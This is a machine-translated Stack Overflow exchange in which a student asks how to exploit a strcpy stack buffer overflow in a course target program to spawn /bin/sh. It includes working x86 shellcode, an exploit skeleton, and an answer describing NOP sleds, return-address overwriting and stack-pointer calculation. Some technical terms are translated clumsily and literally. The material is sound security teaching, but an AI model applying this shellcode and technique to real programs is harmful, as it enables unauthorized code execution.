5

我正在尝试为我的一个 comp sci 课程找出这个问题,我已经利用了所有资源,但仍然遇到问题,如果有人可以提供一些见解,我将不胜感激。

我有这个“目标”,我需要使用缓冲区溢出漏洞执行 execve(“/bin/sh”)。在buf[128]的溢出中,当执行不安全的命令strcpy时,一个指向缓冲区的指针出现在系统期望找到返回地址的位置。

目标.c

int bar(char *arg, char *out)
{
 strcpy(out,arg);
 return 0;
}

int foo(char *argv[])
{
 char buf[128];
 bar(argv[1], buf);
}

int main(int argc, char *argv[])
{
 if (argc != 2)
 {
  fprintf(stderr, "target: argc != 2");
  exit(EXIT_FAILURE);
 }
 foo(argv);
 return 0;
}

漏洞利用.c

#include "shellcode.h"

#define TARGET "/tmp/target1"

int main(void)
{
  char *args[3];
  char *env[1];

  args[0] = TARGET; args[1] = "hi there"; args[2] = NULL;
  env[0] = NULL;

  if (0 > execve(TARGET, args, env))
    fprintf(stderr, "execve failed.\n");

  return 0;
}

外壳代码.h

static char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

我知道我需要用超过 128 个字节填充 argv[1],超过 128 个字节是返回地址,它应该指向缓冲区,以便在其中执行 /bin/sh。到目前为止是正确的吗?有人可以提供下一步吗?

非常感谢您的帮助。

4

1 回答 1

5

好吧,所以你希望程序执行你的 shellcode。它已经是机器形式,因此可以由系统执行。您已将其存储在缓冲区中。因此,问题将是“系统如何知道执行我的代码?” 更准确地说,“系统如何知道在哪里寻找下一个要执行的代码?” 在这种情况下,答案是您正在谈论的退货地址。

基本上,你在正确的轨道上。您是否尝试过执行代码?在执行这种类型的漏洞利用时,我注意到的一件事是它不是一门精确的科学。有时,内存中还有其他您不希望出现的东西,因此您必须增加添加到缓冲区中的字节数,以便正确地将返回地址与系统期望的位置对齐。

我不是安全方面的专家,但我可以告诉你一些可能会有所帮助的事情。一个是我通常包含一个“NOP Sled”——本质上只是一系列 0x90 字节,除了在处理器上执行“NOP”指令之外什么都不做。另一个技巧是在缓冲区的末尾重复返回地址,这样即使其中一个覆盖了堆栈上的返回地址,您也将成功返回到您想要的位置。

因此,您的缓冲区将如下所示:

| 诺普雪橇 | 外壳代码 | 重复退货地址 |

(注意:这些不是我的想法,我是从乔恩·埃里克森(Jon Erickson)的《黑客:剥削的艺术》中得到的。如果您有兴趣了解更多相关信息,我推荐这本书)。

要计算地址,您可以使用类似于以下内容的内容:

unsigned long sp(void) 
{ __asm__("movl %esp, %eax");} // returns the address of the stack pointer

int main(int argc, char *argv[])
{
    int i, offset;
    long esp, ret, *addr_ptr;
    char* buffer;

    offset = 0;
    esp = sp();
    ret = esp - offset;
}

现在, ret 将保存您要返回的返回地址,假设您将缓冲区分配到堆上。

于 2010-10-05T04:14:58.560 回答